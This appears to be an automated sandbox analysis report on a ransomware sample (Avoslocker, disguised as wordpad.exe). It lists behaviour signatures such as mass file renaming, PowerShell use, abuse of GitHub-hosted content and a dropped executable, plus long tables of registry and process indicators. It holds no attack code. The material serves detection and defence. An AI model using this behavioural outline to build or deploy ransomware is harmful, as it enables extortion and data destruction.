Analysis Overview
SHA256
09f10e7344ca61b53a080e4d54c7cb6ecd4e3308254b350906437e29e7a7d9b2
Threat Level: Known bad
The file wordpad.exe was found to be: Known bad.
Malicious Activity Summary
Avoslocker Ransomware
Renames multiple (69) files with added filename extension
Nirsoft
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Process spawned suspicious child process
Drops file in System32 directory
Drops file in Program Files directory
Enumerates physical storage devices
Command and Scripting Interpreter: JavaScript
Unsigned PE
Opens file in notepad (likely ransom note)
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SendNotifyMessage
Modifies data under HKEY_USERS
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-21 10:33
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-21 10:33
Reported
2024-06-21 10:55
Platform
win10v2004-20240611-de
Max time kernel
1009s
Max time network
998s
Command Line
Signatures
Avoslocker Ransomware
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Renames multiple (69) files with added filename extension
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Process spawned suspicious child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE is not expected to spawn this process | N/A | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog.etl | C:\Windows\explorer.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\explorer.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-18_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState = 240000003428000000000000000000000000000001000000130000000000000062000000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect = "0" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000064263917c9c3da01 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowStatusBar = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{470C0EBD-5D73-4D58-9CED-E91E22E23282} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000fb2e3517c9c3da01 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000000db13817c9c3da01 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden = "2" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133634399871534502" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{11DBB47C-A525-400B-9E80-A54615A090C0} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 010000000000000062853a17c9c3da01 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ExplorerStartupTraceRecorded = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor = "1" | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = 00000000ffffffff | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0 = 6800310000000000d558eb551000414456414e437e310000500009000400efbed558eb55d558eb552e0000009c2e02000000060000000000000000000000000000008f8b2c0161006400760061006e00630065006400720075006e002d00780036003400000018000000 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\NodeSlot = "10" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac04000000c8000000354b179bff40d211a27e00c04fc308710300000080000000354b179bff40d211a27e00c04fc308710200000080000000 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e8005398e082303024b98265d99428e115f0000 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\MRUListEx = ffffffff | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
